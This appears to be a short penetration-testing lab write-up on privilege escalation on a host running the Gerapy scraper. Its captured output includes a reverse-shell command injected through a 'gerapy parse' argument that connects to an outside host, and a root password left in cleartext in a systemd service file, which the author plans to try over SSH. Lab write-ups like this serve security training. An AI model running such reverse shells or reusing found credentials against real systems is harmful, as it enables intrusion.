InfoSec LAB

Levram_app.service

Created: 1 min read

app.service

Checking the app.service

app@ubuntu:~$ systemctl status app.service
 app.service - Gerapy app service
     Loaded: loaded (/etc/systemd/system/app.service; enabled; vendor preset: enabled)
     Active: active (running) since Sat 2024-08-03 12:47:19 CST; 8 months 1 day ago
   Main PID: 844 (bash)
      Tasks: 10 (limit: 2234)
     Memory: 115.4M
        CPU: 8.622s
     CGroup: /system.slice/app.service
             ├─ 844 /bin/bash /home/app/run.sh
             ├─1039 /usr/bin/python3 /usr/local/bin/gerapy runserver 0.0.0.0:8000
             ├─1406 /bin/sh -c "gerapy parse --start False --method GET --url None --callback None --cookies '{}' --headers '{}' --meta '{}' --dont_filter False --priority 0 projects/1 \`/bin/bash -c 'bash -i >& /dev/tcp/192.168.45.249/8000 0>&1'\`"
             ├─1407 /bin/bash -c "bash -i >& /dev/tcp/192.168.45.249/8000 0>&1"
             ├─1408 bash -i
             └─1415 systemctl status app.service

/etc/systemd/system/app.service is the service file

/etc/systemd/system/app.service

app@ubuntu:~$ cat /etc/systemd/system/app.service
[Unit]
Description=Gerapy app service
 
# root:4!m?C%7k@Xb?XNH0!>6K
 
[Service]
User=app
Type=simple
ExecStart=/bin/bash /home/app/run.sh
 
 
[Install]
WantedBy=multi-user.target

The service file appears to have the CLEARTEXT credential of the root account; 4!m?C%7k@Xb?XNH0!>6K Validating against the target SSH server

Interactive Graph View

Backlinks